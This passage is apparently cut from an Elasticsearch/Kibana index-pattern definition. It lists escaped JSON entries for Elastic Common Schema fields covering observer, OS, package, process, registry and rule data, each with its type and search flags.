d\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.transport\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.full\"}}},{\"count\":0,\"name\":\"observer.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.name\"}}},{\"count\":0,\"name\":\"observer.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.serial_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"organization.name\"}}},{\"count\":0,\"name\":\"os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.full\"}}},{\"count\":0,\"name\":\"os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.name\"}}},{\"count\":0,\"name\":\"os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.build_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.checksum\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.install_scope\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.installed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.command_line\"}}},{\"count\":0,\"name\":\"process.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.executable\"}}},{\"count\":0,\"name\":\"process.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.parent.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.command_line\"}}},{\"count\":0,\"name\":\"process.parent.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.executable\"}}},{\"count\":0,\"name\":\"process.parent.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.name\"}}},{\"count\":0,\"name\":\"process.parent.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.title\"}}},{\"count\":0,\"name\":\"process.parent.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.working_directory\"}}},{\"count\":0,\"name\":\"process.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.title\"}}},{\"count\":0,\"name\":\"process.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.working_directory\"}}},{\"count\":0,\"name\":\"registry.data.bytes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.strings\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.hive\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.key\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.user\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.ruleset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.uuid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatabl